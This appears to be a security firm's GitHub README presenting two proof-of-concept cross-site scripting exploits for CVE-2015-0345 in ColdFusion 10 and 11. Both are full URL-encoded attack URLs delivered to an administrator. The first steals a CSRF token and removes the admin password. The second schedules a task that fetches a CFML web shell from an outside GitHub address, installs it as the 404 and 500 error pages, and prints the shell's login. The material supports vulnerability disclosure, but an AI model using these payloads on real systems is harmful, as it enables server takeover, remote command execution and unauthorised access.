BishopFox / coldfusion-10-11-xss

ColdFusion 10.x 11.x XSS -> RCE PoC Exploits

This repo contains XSS vectors for CVE-2015-0345 (APSB15-07) that allow for the ability to gain remote command execution on ColdFusion installations.

This exploit is only valid for ColdFusion 10 and 11 installations. Specifically, ColdFusion 11, Update 11 and ColdFusion 10, Update 16 fixes both of these issues. More information on this disclosure can be found here.

##Payload 1

This payload disables the requirement of a password on the ColdFusion administration panel. If this payload is delivered and ran by a ColdFusion administrator, the /CFIDE/administrator directory can be accessed completely, without authentication.

http://<target>/CFIDE/administrator/filedialog/index.cfm?type=dir%27%2c%65%78%70%61%6e%64%65%64%3a%27%5c%78%32%46%27%7d%2c%66%75%6e%63%74%69%6f%6e%28%66%69%6c%65%29%7b%70%61%74%68%20%3d%20%66%69%6c%65%3b%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%74%68%62%6f%78%22%29%2e%76%61%6c%75%65%20%3d%20%70%61%74%68%3b%7d%29%3b%24%2e%67%65%74%28%20%22%2f%43%46%49%44%45%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%73%65%63%75%72%69%74%79%2f%63%66%61%64%6d%69%6e%70%61%73%73%77%6f%72%64%2e%63%66%6d%22%2c%20%66%75%6e%63%74%69%6f%6e%28%20%64%61%74%61%20%29%20%7b%20%76%61%72%20%61%20%3d%20%22%5b%30%2d%39%41%2d%5a%5d%7b%34%30%7d%22%3b%20%76%61%72%20%74%20%3d%20%64%61%74%61%2e%6d%61%74%63%68%28%61%29%3b%20%76%61%72%20%78%68%72%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%20%78%68%72%2e%6f%70%65%6e%28%22%50%4f%53%54%22%2c%20%22%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%38%35%30%30%2f%43%46%49%44%45%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%73%65%63%75%72%69%74%79%2f%63%66%61%64%6d%69%6e%70%61%73%73%77%6f%72%64%2e%63%66%6d%22%2c%20%74%72%75%65%29%3b%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%22%41%63%63%65%70%74%22%2c%20%22%74%65%78%74%2f%68%74%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%68%74%6d%6c%2b%78%6d%6c%2c%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%6d%6c%3b%71%3d%30%2e%39%2c%69%6d%61%67%65%2f%77%65%62%70%2c%2a%2f%2a%3b%71%3d%30%2e%38%22%29%3b%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%22%43%6f%6e%74%65%6e%74%2d%54%79%70%65%22%2c%20%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%22%29%3b%20%78%68%72%2e%73%65%74%52%65%71%75%65%73%74%48%65%61%64%65%72%28%22%41%63%63%65%70%74%2d%4c%61%6e%67%75%61%67%65%22%2c%20%22%65%6e%2d%55%53%2c%65%6e%3b%71%3d%30%2e%38%22%29%3b%20%78%68%72%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%20%3d%20%74%72%75%65%3b%20%76%61%72%20%62%6f%64%79%20%3d%20%22%61%64%6d%69%6e%73%75%62%6d%69%74%3d%53%75%62%6d%69%74%2b%43%68%61%6e%67%65%73%26%63%73%72%66%74%6f%6b%65%6e%3d%22%20%2b%20%74%20%2b%20%22%26%41%64%6d%69%6e%41%75%74%68%3d%6e%6f%6e%65%26%63%66%61%64%6d%69%6e%5f%6f%6c%64%70%61%73%73%77%6f%72%64%3d%26%63%66%61%64%6d%69%6e%5f%4e%65%77%70%61%73%73%77%6f%72%64%3d%26%63%66%61%64%6d%69%6e%5f%4e%65%77%70%61%73%73%77%6f%72%64%43%6f%6e%66%69%72%6d%3d%26%73%65%65%64%3d%26%61%6c%6c%6f%77%63%6f%6e%63%6c%6f%67%69%6e%3d%74%72%75%65%22%3b%20%76%61%72%20%61%42%6f%64%79%20%3d%20%6e%65%77%20%55%69%6e%74%38%41%72%72%61%79%28%62%6f%64%79%2e%6c%65%6e%67%74%68%29%3b%20%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%61%42%6f%64%79%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%61%42%6f%64%79%5b%69%5d%20%3d%20%62%6f%64%79%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%3b%20%78%68%72%2e%73%65%6e%64%28%6e%65%77%20%42%6c%6f%62%28%5b%61%42%6f%64%79%5d%29%29%3b%20%7d%29%3b%24%28%27%23%66%69%6c%65%54%72%65%65%44%65%6d%6f%5f%31%27%29%2e%66%69%6c%65%54%72%65%65%28%7b%73%63%72%69%70%74%3a%27%2e%2e%2f%2e%2e%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%61%6a%61%78%74%72%65%65%2f%6a%71%75%65%72%79%46%69%6c%65%54%72%65%65%2e%63%66%6d%3f%74%79%70%65%3d%64%69%72&fromjscript=true&dialogStyle=selectDirectory&formelem=ORMSearchIndexDirectory&defaultPath=

##Payload 2

This payload attempts to upload a CFM shell to ColdFusion via the scheduling of tasks and modification of 404 and 500 error templates. If this payload delivered and ran by a ColdFusion administrator, a web-shell is then made available at /404.cfm and /500.cfm.

http://<target>/CFIDE/administrator/filedialog/index.cfm?type=dir%27%2cexpanded%3a%27%5cx2F%27%7d%2cfunction%28file%29%7bpath%20%3d%20file%3bdocument%2egetElementById%28%22pathbox%22%29%2evalue%20%3d%20path%3b%7d%29%3bfunction+getCSRFToken%28e%29%7Breturn+%24.get%28e%2Cfunction%28%29%7B%7D%29%7Dfunction+getFullPath%28%29%7Breturn+%24.get%28%22%2FCFIDE%2Fadministrator%2Fsettings%2Fmappings.cfm%22%2Cfunction%28e%29%7Bb%3D%22%2F.%2A%2FCFIDE%26nbsp%22%2Cu%3De.match%28b%29%2Cu%3Du%5B0%5D.replace%28%22%26nbsp%22%2C%22%22%29%7D%29%7Dfunction+postNewTask%28e%2Ct%2Cr%29%7Bvar+n%3D%22csrftoken%3D%22%2Bt%2B%22%26TaskName%3D%22%2Be%2B%22%26Group%3Ddefault%26Start_Date%3D03%252F30%252F2015%26End_Date%3D%26ScheduleType%3DOnce%26StartTimeOnce%3D8%253A44%2BPM%26Interval%3DDaily%26StartTimeDWM%3D%26customInterval_hour%3D0%26customInterval_min%3D0%26customInterval_sec%3D0%26CustomStartTime%3D%26CustomEndTime%3D%26repeatradio%3Drepeatforeverradio%26Repeat%3D%26crontime%3D%26Operation%3DHTTPRequest%26ScheduledURL%3Dhttps%253A%252F%252Fraw.githubusercontent.com%252FhatRiot%252Fclusterd%252Fa748bff7650c2b955fe1bb6a36db340e4ad4a213%252Fsrc%252Flib%252Fcoldfusion%252Ffuze.cfml%26Username%3D%26Password%3D%26Request_Time_out%3D%26proxy_server%3D%26http_proxy_port%3D%26proxy_user%3D%26proxy_password%3D%26publish%3D1%26publish_file%3D%22%2Br%2B%22%26publish_overwrite%3Don%26eventhandler%3D%26exclude%3D%26onmisfire%3D%26onexception%3D%26oncomplete%3D%26priority%3D5%26retrycount%3D3%26advancedmode%3Dtrue%26adminsubmit%3DSubmit%26taskNameOriginal%3D%26groupOriginal%3Ddefault%26modeOriginal%3Dserver%22%3Breturn+%24.ajax%28%7Burl%3A%22%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduleedit.cfm%22%2Ctype%3A%22POST%22%2Cdata%3An%7D%29%7Dfunction+executeTask%28e%2Ct%29%7Breturn+%24.get%28%22%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduletasks.cfm%3Fruntask%3D%22%2Be%2B%22%26group%3Ddefault%26mode%3Dserver%26csrftoken%3D%22%2Bt%2Cfunction%28%29%7B%7D%29%7Dfunction+setAsTemplate%28e%2Ct%29%7Bvar+r%3D%22csrftoken%3D%22%2Bt%2B%22%26LimitTime%3Dtrue%26MaxSeconds%3D60%26enablePerAppSettings%3D1%26uuidtoken%3D1%26enablehttpst%3D1%26WsEnable%3D1%26secureJSONPrefix%3D%252F%252F%26outputBufferMax%3D1024%26enableInMemoryFileSystem%3D1%26inMemoryFileSystemLimit%3D100%26inMemoryFileSystemApplicationLimit%3D20%26WatchInterval%3D120%26globalScriptProtect%3DFORM%252CURL%252CCOOKIE%252CCGI%26allowExtraAttributesInAttrColl%3D1%26cFaaSGeneratedFilesExpiryTime%3D30%26ORMSearchIndexDirectory%3D%26CFFORMScriptSrc%3D%252FCFIDE%252Fscripts%252F%26GoogleMapKey%3D%26serverCFC%3DServer%26compileExtForInclude%3D%2A%26applicationCFCLookup%3D1%26MissingTemplateHandler%3D%22%2BencodeURI%28e%29%2B%22%26SiteWideErrorHandler%3D%22%2BencodeURI%28e%29%2B%22%26postParametersLimit%3D100%26postSizeLimit%3D20%26throttleThreshold%3D4%26throttleMemory%3D200%26adminsubmit%3DSubmit%2BChanges%22%3Breturn+%24.ajax%28%7Burl%3A%22%2FCFIDE%2Fadministrator%2Fsettings%2Fserver_settings.cfm%22%2Ctype%3A%22POST%22%2Cdata%3Ar%7D%29%7Dtask_name%3D%22Coldfusion%2520Update%22%2C%24.when%28getCSRFToken%28%22%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduletasks.cfm%22%29%2CgetFullPath%28%29%29.done%28function%28e%2Ct%29%7Bvar+r%3De%5B2%5D.responseText%2Cn%3D%22%5B0-9A-Z%5D%7B40%7D%22%2Co%3Dr.match%28n%29%5B0%5D%3Bconsole.log%28o%29%3Bvar+a%3Dt%5B2%5D.responseText%2Ci%3D%22%2F.%2A%2FCFIDE%26nbsp%22%2Cs%3Da.match%28i%29%2Cs%3Ds%5B0%5D.replace%28%22%26nbsp%22%2C%22%22%29%3Bconsole.log%28o%2Cs%29%3Bvar+c%3Ds%2B%22%2Fupdate_cf.log%22%2Cl%3D%22%2FCFIDE%2Fupdate_cf.log%22%3B%24.when%28postNewTask%28task_name%2Co%2Cc%29%29.done%28function%28%29%7B%24.when%28executeTask%28task_name%2Co%29%29.done%28function%28%29%7B%24.when%28getCSRFToken%28%22%2FCFIDE%2Fadministrator%2Fsettings%2Fserver_settings.cfm%22%29%29.done%28function%28e%29%7Bvar+t%3De%2Cr%3D%22%5B0-9A-Z%5D%7B40%7D%22%2Cn%3Dt.match%28r%29%5B0%5D%3B%24.when%28setAsTemplate%28l%2Cn%29%29.done%28function%28%29%7Bconsole.log%28%22%25c+Shell+can+be+found+at+%22%2Bdocument.location.origin%2B%22%2F404.cfm%22%2C%22background%3A+%23D14126%3B+color%3A+white%22%29%2Cconsole.log%28%22%25c+Shell+can+be+found+at+%22%2Bdocument.location.origin%2B%22%2F500.cfm%22%2C%22background%3A+%23D14126%3B+color%3A+white%22%29%2Cconsole.log%28%22%25c+Username%3A+god%2C+Password%3A+default%22%2C%22background%3A+%23D14126%3B+color%3A+white%22%29%7D%29%7D%29%7D%29%7D%29%7D%29%3B%24%28%27%23fileTreeDemo_1%27%29%2efileTree%28%7bscript%3a%27%2e%2e%2f%2e%2e%2fadministrator%2fajaxtree%2fjqueryFileTree%2ecfm%3ftype%3ddir&fromjscript=true&dialogStyle=selectDirectory&formelem=ORMSearchIndexDirectory&defaultPath=